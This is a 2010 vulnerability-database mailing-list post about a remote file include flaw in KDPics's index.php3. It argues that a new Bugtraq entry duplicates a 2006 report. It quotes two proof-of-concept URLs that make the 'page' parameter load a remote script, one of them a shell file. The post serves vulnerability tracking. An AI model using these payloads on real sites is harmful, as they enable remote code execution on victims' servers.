[VIM] KDPics 'index.php3' Remote File Include Vulnerability
George A. Theall
theall at tenable.com
Mon Aug 9 09:15:21 CDT 2010
Bugtraq 42312 was just released to cover a remote file include in
KDPics version 1.11, apparently reported by Fl0riX and covered by http://packetstormsecurity.nl/1008-exploits/kdpics-rfi.txt
. The PoC looks similar to one reported by Mr_KaLiMaN in 2006 and
covered by CVE-2006-6516 / Bugtraq 21515 / OSVDB 31868:
site/index.php3?page=http://fl0rix/shell.txt?
versus:
http://[victim]/[kdpics_path]/index.php3?page=http://evil_script.txt?
Looks like another dup to me. Rob?
George
--
theall at tenablesecurity.com
More information about the VIM
mailing list